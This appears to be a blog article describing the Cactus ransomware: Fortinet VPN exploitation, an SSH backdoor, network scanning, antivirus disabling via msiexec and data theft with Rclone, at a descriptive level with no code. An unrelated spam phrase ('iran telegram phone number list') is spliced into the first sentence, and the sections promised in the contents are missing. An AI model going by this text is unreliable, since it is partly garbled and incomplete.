As is evident, cybercrime is constantly evolving, leveraging iran telegram phone number list sophisticated technologies and attack techniques. Ransomware, in particular, is forcing companies to deal with ever-new and sometimes unknown threats.
Table of Contents:
The New Cactus Ransomware: What We Know
The main characteristics of ransomware
How does Cactus ransomware spread?
Why is Cactus a unique ransomware?
The main actions that allow you to protect yourself from threats
The New Cactus Ransomware: What We Know
According to preliminary information, Cactus is the new ransomware strain that uses cutting-edge techniques to steal data and encrypt files, with the peculiarity of using a different method to avoid detection.
The attack's naming comes from the name of the file provided within the ransom note, cAcTuS.readme.txt .
The main characteristics of ransomware
The history of Cactus is very recent. In fact, it is a threat that has been active since March 2023. The attack exploits vulnerabilities related to Fortinet VPN appliances, with the aim of permeating the networks of large commercial entities.
In all cases observed by Kroll, the attacker gained access to the VPN service and used an SSH backdoor that he can then reach from a command and control (C2) server to maintain control of the devices. Interestingly, once inside the network, the cybercriminal scouts using SoftPerfect Network Scanner (netscan) to identify the most attractive target.
Another particular feature of Cactus is the use of encryption to protect the specific code of this ransomware. Two systems are therefore exploited: the 7Zip archive and the batch script, with the latter using msiexec to deactivate the protection of antivirus software , thus being able to act freely to steal data. For this purpose, Cactus uses Rclone, which allows file transfer to the cloud.
